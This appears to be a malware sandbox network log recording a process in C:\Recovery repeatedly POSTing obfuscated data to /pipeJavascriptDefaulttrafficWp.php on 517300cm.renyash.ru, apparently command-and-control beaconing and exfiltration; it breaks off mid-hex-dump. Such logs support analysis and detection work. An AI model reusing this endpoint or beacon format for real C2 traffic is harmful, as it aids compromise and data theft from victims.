Jan 9, 2025 18:12:57.049801111 CET	1264	OUT	Data Raw: 50 5e 5e 5c 58 46 50 57 59 58 51 54 5b 52 57 57 5f 51 58 5d 52 5a 5a 49 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: P^^\XFPWYXQT[RWW_QX]RZZI^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z#* =X7-? <8;< % < -$0!2;$78+'\"/Y.
Jan 9, 2025 18:12:57.143429041 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:12:57.464409113 CET	951	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 17:12:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DozTtj0fbm4YwhlFQPDcYoPm7HYkrwu9po2vtncO4zvLq%2FT6FB31JM8udJKNWU6oGLXuT8Da1UZOFiNNA1QFe64W3znI6wguCyIpMjzUO%2FDkrZVuhHdqq3EOs8MUvsuCaCGAx2us"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff60e1ced214297-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=6672&min_rtt=3943&rtt_var=6938&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1589&delivery_rate=56628&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 38 0d 0a 06 1f 22 04 25 35 33 57 27 05 37 54 31 31 07 55 36 31 22 17 3b 3e 38 07 37 29 38 04 2c 54 39 13 22 2c 2f 17 27 0c 0b 50 26 2c 28 0b 36 0c 21 5d 01 12 27 02 30 07 0f 00 25 2d 28 59 31 06 27 41 37 10 05 00 30 15 26 51 31 23 34 57 21 03 00 0d 2a 04 35 59 2c 06 38 1b 2f 27 34 5b 3c 03 2b 51 0e 10 21 09 33 5b 3e 5f 3f 3e 02 03 25 22 12 55 3d 01 37 5b 24 2c 34 1c 2a 39 28 1f 24 2a 34 12 23 3f 28 59 2b 39 28 5a 27 5e 25 51 2a 38 20 5c 2e 00 2d 52 04 3e 54 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 98"%53W'7T11U61";>87)8,T9",/'P&,(6!]'0%-(Y1'A70&Q1#4W!5Y,8/'4[<+Q!3[>_?>%"U=7[$,49($4#?(Y+9(Z'^%Q8 \.-R>TP0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.4	49798	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:12:56.800209045 CET	325	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 18:12:57.159164906 CET	1012	OUT	Data Raw: 50 54 5e 5c 58 42 50 52 59 58 51 54 5b 53 57 55 5f 53 58 59 52 52 5a 40 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: PT^\XBPRYXQT[SWU_SXYRRZ@^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z#_>35#?.]>U#], 7<)?!)20>&;'#/$('\"/Y.8
Jan 9, 2025 18:12:57.269793987 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:12:57.555706024 CET	809	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 17:12:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=t84imgLWyLA8XU9k2To7t%2Fcoyz4ZT%2F871aCNnJ8mkOb%2BICvZKMErkJjwMCwv3EAAN4VmyGsLYAlsEIOvFG47A38RSKkfQqAbAnGk0w%2F2pwsX1JgwZQvLGBrglk%2BgkmNAFarUqzw2"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff60e1d98947c8a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3294&min_rtt=2011&rtt_var=3320&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1337&delivery_rate=118921&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 58 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 44WXP0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.4	49804	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:12:57.676300049 CET	301	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1012 Expect: 100-continue
Jan 9, 2025 18:12:58.034178019 CET	1012	OUT	Data Raw: 50 51 5e 5e 58 42 50 50 59 58 51 54 5b 51 57 51 5f 54 58 5b 52 5b 5a 48 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: PQ^^XBPPYXQT[QWQ_TX[R[ZH^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z#X+3-Y#>X=3<,;4 7*/ >:%12;7'('\"/Y.0
Jan 9, 2025 18:12:58.128081083 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:12:58.421140909 CET	812	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 17:12:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FudJg2KD4yrD8xM%2FGr%2FsiV6rz2qZ94nJ0gXinxx%2ByHO7EIhGux%2B5UG5G4N8FVw7oq%2BzcXax46KgL7N%2FJc7v8SNED2JUSnq94OWmI7peMcIVuaTg4kz2Hy7yJegqd%2BEGptWIhpjeD"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff60e230d7b0f85-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4654&min_rtt=1520&rtt_var=6838&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1313&delivery_rate=54897&cwnd=203&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 58 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 44WXP0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.4	49810	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:12:58.550849915 CET	325	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 18:12:58.909172058 CET	1012	OUT	Data Raw: 50 5f 5b 5f 58 46 55 54 59 58 51 54 5b 5d 57 5d 5f 57 58 58 52 5b 5a 41 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: P_[_XFUTYXQT[]W]_WXXR[ZA^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z#[>3 Z1)];8]#6$* >=S$ %+Y!<'+'\"/Y.
Jan 9, 2025 18:12:59.019953966 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:12:59.194550037 CET	806	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 17:12:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E%2B2AhvPSBZMx5j47EZTlud2GX%2BRLLDxzy8X2fHGBUKXBjnTcgDr4J%2BYuRKsygU3Hx4Rtj1ssa6grz%2FM2Wf0IDy0Vj2h06NBn0MpqU1uh90nt0BqyVDtpMavwHF59w3zd1XFiVmIa"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff60e2899550f97-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4724&min_rtt=1701&rtt_var=6684&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1337&delivery_rate=56396&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 58 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 44WXP0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.4	49816	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:12:59.317107916 CET	325	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 18:12:59.674782038 CET	1012	OUT	Data Raw: 50 5e 5e 5e 58 49 55 54 59 58 51 54 5b 56 57 56 5f 55 58 55 52 52 5a 43 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: P^^^XIUTYXQT[VWV_UXURRZC^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z#Z=!7<**#?,\ 6$>:? =5U101%(#^#++:'\"/Y.,
Jan 9, 2025 18:12:59.899044037 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:13:00.113049984 CET	811	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 17:13:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PwqjIBuGlhF39aMp6qzZn5O2n95svdX8G30fRgRdjIIbA36e%2FpScCpxbP4q7%2BvxBoMpaXIuPqL9yiAkZKXPrBghCxYP%2B7sv%2Bun7f4psE4NMr2B%2FPE6f07CLTc0SnfhqSCY2aR2NP"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff60e2dfb9d421b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=76641&min_rtt=76216&rtt_var=29432&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1337&delivery_rate=18336&cwnd=186&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 58 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 44WXP0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.4	49822	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:13:00.239593983 CET	325	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 18:13:00.596703053 CET	1012	OUT	Data Raw: 50 57 5b 54 58 47 55 51 59 58 51 54 5b 57 57 5d 5f 52 58 5f 52 52 5a 49 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: PW[TXGUQYXQT[WW]_RX_RRZI^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z#+#=!/._= 8+4#5_=8T5-.&-W&+$#?4+*'\"/Y.(
Jan 9, 2025 18:13:00.800355911 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:13:01.000638008 CET	815	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 17:13:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PXaYZcPmsQ6r3usXI%2BrwOclzjSAHYEh%2B%2F4AY0sohrPIFD9v5va9HebE0hPTrMQn4HbRVhJroUurDzaoZWNs4ZACTezfpiKe%2BsooDH%2BG0yMmt8Rt6ioAHDdJ1XLhyg%2BD%2FJM8rJnl2"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff60e33a93a6a50-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=18462&min_rtt=12739&rtt_var=16224&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1337&delivery_rate=24946&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 58 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 44WXP0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.4	49828	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:13:01.131452084 CET	325	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 18:13:01.487328053 CET	1012	OUT	Data Raw: 50 5f 5b 54 58 47 55 50 59 58 51 54 5b 50 57 55 5f 51 58 58 52 5d 5a 44 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: P_[TXGUPYXQT[PWU_QXXR]ZD^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z#> :#\#?]-(#Z#6<)+!-%3%T2; <#)'\"/Y.4
Jan 9, 2025 18:13:01.903815985 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:13:01.905703068 CET	811	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 17:13:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mDpzBZr7n7lx62cUI%2F%2FZOHU3Gf3%2BR69MQB3ucETUwvfmysjclgsNIGvUcQR%2Fh%2BRLQB3ETaS3SEAV6XJmRECz6h4jud2HusWdxcueGXqa1NfOCzcqcgp8dD0L203fn3QlSHtR9u0u"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff60e391f0b7d16-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=16291&min_rtt=10207&rtt_var=15996&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1337&delivery_rate=24795&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 58 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 44WXP0
Jan 9, 2025 18:13:01.906591892 CET	811	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 17:13:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mDpzBZr7n7lx62cUI%2F%2FZOHU3Gf3%2BR69MQB3ucETUwvfmysjclgsNIGvUcQR%2Fh%2BRLQB3ETaS3SEAV6XJmRECz6h4jud2HusWdxcueGXqa1NfOCzcqcgp8dD0L203fn3QlSHtR9u0u"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff60e391f0b7d16-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=16291&min_rtt=10207&rtt_var=15996&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1337&delivery_rate=24795&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 58 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 44WXP0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.4	49834	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:13:02.038675070 CET	325	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 18:13:02.393739939 CET	1012	OUT	Data Raw: 50 56 5b 5b 58 43 55 5f 59 58 51 54 5b 50 57 5d 5f 5c 58 5e 52 59 5a 49 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: PV[[XCU_YXQT[PW]_\X^RYZI^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z#X)!,*#4,^?[#57^)9$S"%"2+4//_('\"/Y.4

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.4	49836	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:13:02.506709099 CET	325	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1292 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 18:13:02.868545055 CET	1292	OUT	Data Raw: 50 52 5b 59 5d 45 55 5e 59 58 51 54 5b 53 57 56 5f 52 58 5d 52 5c 5a 42 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: PR[Y]EU^YXQT[SWV_RX]R\ZB^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z )_ /==33;8<7&'Z:#">!W&V-&8 #,;)'\"/Y.8
Jan 9, 2025 18:13:02.940319061 CET	1236	OUT	Data Raw: 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 57 5d 51 5e 5a 5f 57 55 56 5d 42 5e 51 55 58 5c 58 53 59 51 5c 58 55 5b 5c 5e 58 55 42 55 51 5a 50 58 5d 5e 56 53 54 54 5e 53 59 55 42 59 58 5a 56 5f 53 5f 5b 58 59 54 Data Ascii: Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z )_ /==33;8<7&'Z:#">!W&V-&8 #,;)'\"/Y.8- [/#Y(%."2&?W%<3P%W!T52.Y/.#:,2%^"/&"P2/3
Jan 9, 2025 18:13:03.252826929 CET	1236	OUT	Data Raw: 50 52 5b 59 5d 45 55 5e 59 58 51 54 5b 53 57 56 5f 52 58 5d 52 5c 5a 42 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: PR[Y]EU^YXQT[SWV_RX]R\ZB^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z )_ /==33;8<7&'Z:#">!W&V-&8 #,;)'\"/Y.8
Jan 9, 2025 18:13:03.729639053 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:13:03.729887962 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:13:03.730046988 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:13:03.862214088 CET	1236	OUT	Data Raw: 50 52 5b 59 5d 45 55 5e 59 58 51 54 5b 53 57 56 5f 52 58 5d 52 5c 5a 42 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: PR[Y]EU^YXQT[SWV_RX]R\ZB^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z )_ /==33;8<7&'Z:#">!W&V-&8 #,;)'\"/Y.8
Jan 9, 2025 18:13:03.937808990 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:13:03.939469099 CET	56	OUT	Data Raw: 21 5b 29 1e 31 33 21 57 31 2b 30 02 34 01 05 5c 3c 03 3f 10 29 2d 32 59 2b 35 3b 5d 29 2d 05 01 2a 05 16 00 2c 00 27 5c 2c 22 3a 40 2a 0c 07 04 22 1f 57 5f 0c 39 5f 59 Data Ascii: ![)13!W1+04\<?)-2Y+5;])-,'\,":@"W_9_Y
Jan 9, 2025 18:13:04.308835983 CET	959	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 17:13:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F3jA5T8Tz9IYfCmJi9j4wBa%2FVXiTBCo0TXYNDaihhSzz01Ik2th6PVigwjCzenZ8WUpPvt87IeAZMb%2BqLDbdmPHsfGR%2B4HxmfHnfSFswM9kWpNBxGwQgx6ibsSsTiD%2BUZzkWT%2FMD"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff60e417e4042be-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3284&min_rtt=1647&rtt_var=3892&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1617&delivery_rate=99003&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 38 0d 0a 06 1f 22 06 31 1c 37 1f 25 3c 23 56 25 22 22 0c 22 0f 2a 15 2c 07 20 42 20 03 24 04 2f 31 39 5f 21 06 2f 17 26 32 26 0b 27 3c 3b 57 22 0c 21 5d 01 12 27 02 27 5f 22 59 30 2e 06 59 32 3b 20 1a 23 10 09 01 24 15 22 50 26 0d 3c 52 36 03 21 55 3e 5b 35 59 38 06 38 1b 2e 37 28 59 2b 29 2b 51 0e 10 22 52 25 3d 2a 15 2b 10 33 58 25 31 23 0b 3d 3c 3f 5c 26 05 37 0b 28 39 2b 0d 33 39 23 00 23 06 28 58 28 3a 06 5d 30 